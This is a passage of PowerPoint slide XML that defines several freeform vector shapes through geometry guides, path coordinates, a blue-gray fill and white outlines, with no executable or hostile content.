                  <a:gd name="T39" fmla="*/ 10 h 30"/>
                  <a:gd name="T40" fmla="*/ 24 w 27"/>
                  <a:gd name="T41" fmla="*/ 12 h 30"/>
                  <a:gd name="T42" fmla="*/ 20 w 27"/>
                  <a:gd name="T43" fmla="*/ 12 h 30"/>
                  <a:gd name="T44" fmla="*/ 16 w 27"/>
                  <a:gd name="T45" fmla="*/ 15 h 30"/>
                  <a:gd name="T46" fmla="*/ 12 w 27"/>
                  <a:gd name="T47" fmla="*/ 18 h 30"/>
                  <a:gd name="T48" fmla="*/ 14 w 27"/>
                  <a:gd name="T49" fmla="*/ 19 h 30"/>
                  <a:gd name="T50" fmla="*/ 19 w 27"/>
                  <a:gd name="T51" fmla="*/ 19 h 30"/>
                  <a:gd name="T52" fmla="*/ 21 w 27"/>
                  <a:gd name="T53" fmla="*/ 19 h 30"/>
                  <a:gd name="T54" fmla="*/ 24 w 27"/>
                  <a:gd name="T55" fmla="*/ 20 h 30"/>
                  <a:gd name="T56" fmla="*/ 23 w 27"/>
                  <a:gd name="T57" fmla="*/ 22 h 30"/>
                  <a:gd name="T58" fmla="*/ 21 w 27"/>
                  <a:gd name="T59" fmla="*/ 25 h 30"/>
                  <a:gd name="T60" fmla="*/ 18 w 27"/>
                  <a:gd name="T61" fmla="*/ 29 h 30"/>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27"/>
                  <a:gd name="T94" fmla="*/ 0 h 30"/>
                  <a:gd name="T95" fmla="*/ 27 w 27"/>
                  <a:gd name="T96" fmla="*/ 30 h 30"/>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27" h="30">
                    <a:moveTo>
                      <a:pt x="18" y="29"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="29"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36379" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3392" y="2741"/>
                <a:ext cx="27" cy="30"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 27"/>
                  <a:gd name="T1" fmla="*/ 29 h 30"/>
                  <a:gd name="T2" fmla="*/ 14 w 27"/>
                  <a:gd name="T3" fmla="*/ 28 h 30"/>
                  <a:gd name="T4" fmla="*/ 11 w 27"/>
                  <a:gd name="T5" fmla="*/ 27 h 30"/>
                  <a:gd name="T6" fmla="*/ 5 w 27"/>
                  <a:gd name="T7" fmla="*/ 29 h 30"/>
                  <a:gd name="T8" fmla="*/ 1 w 27"/>
                  <a:gd name="T9" fmla="*/ 30 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 27"/>
                  <a:gd name="T11" fmla="*/ 21 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 27"/>
                  <a:gd name="T13" fmla="*/ 18 h 30"/>
                  <a:gd name="T14" fmla="*/ 1 w 27"/>
                  <a:gd name="T15" fmla="*/ 17 h 30"/>
                  <a:gd name="T16" fmla="*/ 4 w 27"/>
                  <a:gd name="T17" fmla="*/ 12 h 30"/>
                  <a:gd name="T18" fmla="*/ 8 w 27"/>
                  <a:gd name="T19" fmla="*/ 5 h 30"/>
                  <a:gd name="T20" fmla="*/ 9 w 27"/>
                  <a:gd name="T21" fmla="*/ 5 h 30"/>
                  <a:gd name="T22" fmla="*/ 10 w 27"/>
                  <a:gd name="T23" fmla="*/ 4 h 30"/>
                  <a:gd name="T24" fmla="*/ 13 w 27"/>
                  <a:gd name="T25" fmla="*/ 5 h 30"/>
                  <a:gd name="T26" fmla="*/ 16 w 27"/>
                  <a:gd name="T27" fmla="*/ 6 h 30"/>
                  <a:gd name="T28" fmla="*/ 20 w 27"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 20 w 27"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 25 w 27"/>
                  <a:gd name="T33" fmla="*/ 4 h 30"/>
                  <a:gd name="T34" fmla="*/ 27 w 27"/>
                  <a:gd name="T35" fmla="*/ 7 h 30"/>
                  <a:gd name="T36" fmla="*/ 27 w 27"/>
                  <a:gd name="T37" fmla="*/ 10 h 30"/>
                  <a:gd name="T38" fmla="*/ 26 w 27"/>
                  <a:gd name="T39" fmla="*/ 10 h 30"/>
                  <a:gd name="T40" fmla="*/ 24 w 27"/>
                  <a:gd name="T41" fmla="*/ 12 h 30"/>
                  <a:gd name="T42" fmla="*/ 20 w 27"/>
                  <a:gd name="T43" fmla="*/ 12 h 30"/>
                  <a:gd name="T44" fmla="*/ 16 w 27"/>
                  <a:gd name="T45" fmla="*/ 15 h 30"/>
                  <a:gd name="T46" fmla="*/ 12 w 27"/>
                  <a:gd name="T47" fmla="*/ 18 h 30"/>
                  <a:gd name="T48" fmla="*/ 14 w 27"/>
                  <a:gd name="T49" fmla="*/ 19 h 30"/>
                  <a:gd name="T50" fmla="*/ 19 w 27"/>
                  <a:gd name="T51" fmla="*/ 19 h 30"/>
                  <a:gd name="T52" fmla="*/ 21 w 27"/>
                  <a:gd name="T53" fmla="*/ 19 h 30"/>
                  <a:gd name="T54" fmla="*/ 24 w 27"/>
                  <a:gd name="T55" fmla="*/ 20 h 30"/>
                  <a:gd name="T56" fmla="*/ 23 w 27"/>
                  <a:gd name="T57" fmla="*/ 22 h 30"/>
                  <a:gd name="T58" fmla="*/ 21 w 27"/>
                  <a:gd name="T59" fmla="*/ 25 h 30"/>
                  <a:gd name="T60" fmla="*/ 18 w 27"/>
                  <a:gd name="T61" fmla="*/ 29 h 30"/>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27"/>
                  <a:gd name="T94" fmla="*/ 0 h 30"/>
                  <a:gd name="T95" fmla="*/ 27 w 27"/>
                  <a:gd name="T96" fmla="*/ 30 h 30"/>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27" h="30">
                    <a:moveTo>
                      <a:pt x="18" y="29"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="29"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36380" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3546" y="2516"/>
                <a:ext cx="12" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 12"/>
                  <a:gd name="T1" fmla="*/ 29 h 29"/>
                  <a:gd name="T2" fmla="*/ 4 w 12"/>
                  <a:gd name="T3" fmla="*/ 29 h 29"/>
                  <a:gd name="T4" fmla="*/ 2 w 12"/>
                  <a:gd name="T5" fmla="*/ 28 h 29"/>
                  <a:gd name="T6" fmla="*/ 2 w 12"/>
                  <a:gd name="T7" fmla="*/ 23 h 29"/>
                  <a:gd name="T8" fmla="*/ 1 w 12"/>
                  <a:gd name="T9" fmla="*/ 20 h 29"/>
                  <a:gd name="T10" fmla="*/ 0 w 12"/>
                  <a:gd name="T11" fmla="*/ 14 h 29"/>
                  <a:gd name="T12" fmla="*/ 1 w 12"/>
                  <a:gd name="T13" fmla="*/ 9 h 29"/>
                  <a:gd name="T14" fmla="*/ 2 w 12"/>
                  <a:gd name="T15" fmla="*/ 8 h 29"/>
                  <a:gd name="T16" fmla="*/ 2 w 12"/>
                  <a:gd name="T17" fmla="*/ 7 h 29"/>
                  <a:gd name="T18" fmla="*/ 3 w 12"/>
                  <a:gd name="T19" fmla="*/ 2 h 29"/>
                  <a:gd name="T20" fmla="*/ 6 w 12"/>
                  <a:gd name="T21" fmla="*/ 0 h 29"/>
                  <a:gd name="T22" fmla="*/ 8 w 12"/>
                  <a:gd name="T23" fmla="*/ 0 h 29"/>
                  <a:gd name="T24" fmla="*/ 8 w 12"/>
                  <a:gd name="T25" fmla="*/ 3 h 29"/>
                  <a:gd name="T26" fmla="*/ 10 w 12"/>
                  <a:gd name="T27" fmla="*/ 4 h 29"/>
                  <a:gd name="T28" fmla="*/ 11 w 12"/>
                  <a:gd name="T29" fmla="*/ 5 h 29"/>
                  <a:gd name="T30" fmla="*/ 11 w 12"/>
                  <a:gd name="T31" fmla="*/ 8 h 29"/>
                  <a:gd name="T32" fmla="*/ 11 w 12"/>
                  <a:gd name="T33" fmla="*/ 11 h 29"/>
                  <a:gd name="T34" fmla="*/ 11 w 12"/>
                  <a:gd name="T35" fmla="*/ 17 h 29"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 19 h 29"/>
                  <a:gd name="T38" fmla="*/ 11 w 12"/>
                  <a:gd name="T39" fmla="*/ 22 h 29"/>
                  <a:gd name="T40" fmla="*/ 9 w 12"/>
                  <a:gd name="T41" fmla="*/ 25 h 29"/>
                  <a:gd name="T42" fmla="*/ 7 w 12"/>
                  <a:gd name="T43" fmla="*/ 29 h 29"/>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2"/>
                  <a:gd name="T67" fmla="*/ 0 h 29"/>
                  <a:gd name="T68" fmla="*/ 12 w 12"/>
                  <a:gd name="T69" fmla="*/ 29 h 29"/>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2" h="29">
                    <a:moveTo>
                      <a:pt x="7" y="29"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36381" name="Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3546" y="2516"/>
                <a:ext cx="12" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 12"/>
                  <a:gd name="T1" fmla="*/ 29 h 29"/>
                  <a:gd name="T2" fmla="*/ 4 w 12"/>
                  <a:gd name="T3" fmla="*/ 29 h 29"/>
                  <a:gd name="T4" fmla="*/ 2 w 12"/>
                  <a:gd name="T5" fmla="*/ 28 h 29"/>
                  <a:gd name="T6" fmla="*/ 2 w 12"/>
                  <a:gd name="T7" fmla="*/ 23 h 29"/>
                  <a:gd name="T8" fmla="*/ 1 w 12"/>
                  <a:gd name="T9" fmla="*/ 20 h 29"/>
                  <a:gd name="T10" fmla="*/ 0 w 12"/>
                  <a:gd name="T11" fmla="*/ 14 h 29"/>
                  <a:gd name="T12" fmla="*/ 1 w 12"/>
                  <a:gd name="T13" fmla="*/ 9 h 29"/>
                  <a:gd name="T14" fmla="*/ 2 w 12"/>
                  <a:gd name="T15" fmla="*/ 8 h 29"/>
                  <a:gd name="T16" fmla="*/ 2 w 12"/>
                  <a:gd name="T17" fmla="*/ 7 h 29"/>
                  <a:gd name="T18" fmla="*/ 3 w 12"/>
                  <a:gd name="T19" fmla="*/ 2 h 29"/>
                  <a:gd name="T20" fmla="*/ 6 w 12"/>
                  <a:gd name="T21" fmla="*/ 0 h 29"/>
                  <a:gd name="T22" fmla="*/ 8 w 12"/>
                  <a:gd name="T23" fmla="*/ 0 h 29"/>
                  <a:gd name="T24" fmla="*/ 8 w 12"/>
                  <a:gd name="T25" fmla="*/ 3 h 29"/>
                  <a:gd name="T26" fmla="*/ 10 w 12"/>
                  <a:gd name="T27" fmla="*/ 4 h 29"/>
                  <a:gd name="T28" fmla="*/ 11 w 12"/>
                  <a:gd name="T29" fmla="*/ 5 h 29"/>
                  <a:gd name="T30" fmla="*/ 11 w 12"/>
                  <a:gd name="T31" fmla="*/ 8 h 29"/>
                  <a:gd name="T32" fmla="*/ 11 w 12"/>
                  <a:gd name="T33" fmla="*/ 11 h 29"/>
                  <a:gd name="T34" fmla="*/ 11 w 12"/>
                  <a:gd name="T35" fmla="*/ 17 h 29"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 19 h 29"/>
                  <a:gd name="T38" fmla="*/ 11 w 12"/>
                  <a:gd name="T39" fmla="*/ 22 h 29"/>
                  <a:gd name="T40" fmla="*/ 9 w 12"/>
                  <a:gd name="T41" fmla="*/ 25 h 29"/>
                  <a:gd name="T42" fmla="*/ 7 w 12"/>
                  <a:gd name="T43" fmla="*/ 29 h 29"/>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2"/>
                  <a:gd name="T67" fmla="*/ 0 h 29"/>
                  <a:gd name="T68" fmla="*/ 12 w 12"/>
                  <a:gd name="T69" fmla="*/ 29 h 29"/>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2" h="29">
                    <a:moveTo>
                      <a:pt x="7" y="29"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36382" name="Freeform 114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3418" y="2637"/>
                <a:ext cx="163" cy="105"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 160 w 163"/>
                  <a:gd name="T1" fmla="*/ 40 h 105"/>
                  <a:gd name="T2" fmla="*/ 152 w 163"/>
                  <a:gd name="T3" fmla="*/ 46 h 105"/>
                  <a:gd name="T4" fmla="*/ 149 w 163"/>
                  <a:gd name="T5" fmla="*/ 52 h 105"/>
                  <a:gd name="T6" fmla="*/ 145 w 163"/>
                  <a:gd name="T7" fmla="*/ 57 h 105"/>
                  <a:gd name="T8" fmla="*/ 119 w 163"/>
                  <a:gd name="T9" fmla="*/ 67 h 105"/>
                  <a:gd name="T10" fmla="*/ 104 w 163"/>
                  <a:gd name="T11" fmla="*/ 72 h 105"/>
                  <a:gd name="T12" fmla="*/ 98 w 163"/>
                  <a:gd name="T13" fmla="*/ 79 h 105"/>
                  <a:gd name="T14" fmla="*/ 91 w 163"/>
                  <a:gd name="T15" fmla="*/ 82 h 105"/>
                  <a:gd name="T16" fmla="*/ 83 w 163"/>
                  <a:gd name="T17" fmla="*/ 82 h 105"/>
                  <a:gd name="T18" fmla="*/ 73 w 163"/>
                  <a:gd name="T19" fmla="*/ 88 h 105"/>
                  <a:gd name="T20" fmla="*/ 61 w 163"/>
                  <a:gd name="T21" fmla="*/ 92 h 105"/>
                  <a:gd name="T22" fmla="*/ 48 w 163"/>
                  <a:gd name="T23" fmla="*/ 92 h 105"/>
                  <a:gd name="T24" fmla="*/ 43 w 163"/>
                  <a:gd name="T25" fmla="*/ 96 h 105"/>
                  <a:gd name="T26" fmla="*/ 38 w 163"/>
                  <a:gd name="T27" fmla="*/ 100 h 105"/>
                  <a:gd name="T28" fmla="*/ 32 w 163"/>
                  <a:gd name="T29" fmla="*/ 102 h 105"/>
                  <a:gd name="T30" fmla="*/ 26 w 163"/>
                  <a:gd name="T31" fmla="*/ 105 h 105"/>
                  <a:gd name="T32" fmla="*/ 17 w 163"/>
                  <a:gd name="T33" fmla="*/ 104 h 105"/>
                  <a:gd name="T34" fmla="*/ 11 w 163"/>
                  <a:gd name="T35" fmla="*/ 100 h 105"/>
                  <a:gd name="T36" fmla="*/ 8 w 163"/>
                  <a:gd name="T37" fmla="*/ 95 h 105"/>
                  <a:gd name="T38" fmla="*/ 9 w 163"/>
                  <a:gd name="T39" fmla="*/ 85 h 105"/>
                  <a:gd name="T40" fmla="*/ 4 w 163"/>
                  <a:gd name="T41" fmla="*/ 73 h 105"/>
                  <a:gd name="T42" fmla="*/ 0 w 163"/>
                  <a:gd name="T43" fmla="*/ 55 h 105"/>
                  <a:gd name="T44" fmla="*/ 1 w 163"/>
                  <a:gd name="T45" fmla="*/ 45 h 105"/>
                  <a:gd name="T46" fmla="*/ 7 w 163"/>
                  <a:gd name="T47" fmla="*/ 36 h 105"/>
                  <a:gd name="T48" fmla="*/ 7 w 163"/>
                  <a:gd name="T49" fmla="*/ 27 h 105"/>
                  <a:gd name="T50" fmla="*/ 10 w 163"/>
                  <a:gd name="T51" fmla="*/ 25 h 105"/>
                  <a:gd name="T52" fmla="*/ 18 w 163"/>
                  <a:gd name="T53" fmla="*/ 27 h 105"/>
                  <a:gd name="T54" fmla="*/ 26 w 163"/>
                  <a:gd name="T55" fmla="*/ 27 h 105"/>
                  <a:gd name="T56" fmla="*/ 44 w 163"/>
                  <a:gd name="T57" fmla="*/ 65 h 105"/>
                  <a:gd name="T58" fmla="*/ 72 w 163"/>
                  <a:gd name="T59" fmla="*/ 29 h 105"/>
                  <a:gd name="T60" fmla="*/ 75 w 163"/>
                  <a:gd name="T61" fmla="*/ 25 h 105"/>
                  <a:gd name="T62" fmla="*/ 111 w 163"/>
                  <a:gd name="T63" fmla="*/ 11 h 105"/>
                  <a:gd name="T64" fmla="*/ 142 w 163"/>
                  <a:gd name="T65" fmla="*/ 1 h 105"/>
                  <a:gd name="T66" fmla="*/ 144 w 163"/>
                  <a:gd name="T67" fmla="*/ 5 h 105"/>
                  <a:gd name="T68" fmla="*/ 150 w 163"/>
                  <a:gd name="T69" fmla="*/ 17 h 105"/>
                  <a:gd name="T70" fmla="*/ 157 w 163"/>
                  <a:gd name="T71" fmla="*/ 29 h 105"/>
                  <a:gd name="T72" fmla="*/ 161 w 163"/>
                  <a:gd name="T73" fmla="*/ 37 h 105"/>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63"/>
                  <a:gd name="T112" fmla="*/ 0 h 105"/>
                  <a:gd name="T113" fmla="*/ 163 w 163"/>
                  <a:gd name="T114" fmla="*/ 105 h 105"/>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63" h="105">
                    <a:moveTo>
                      <a:pt x="163" y="39"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="160" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="101"/>
                    </a:lnTo>
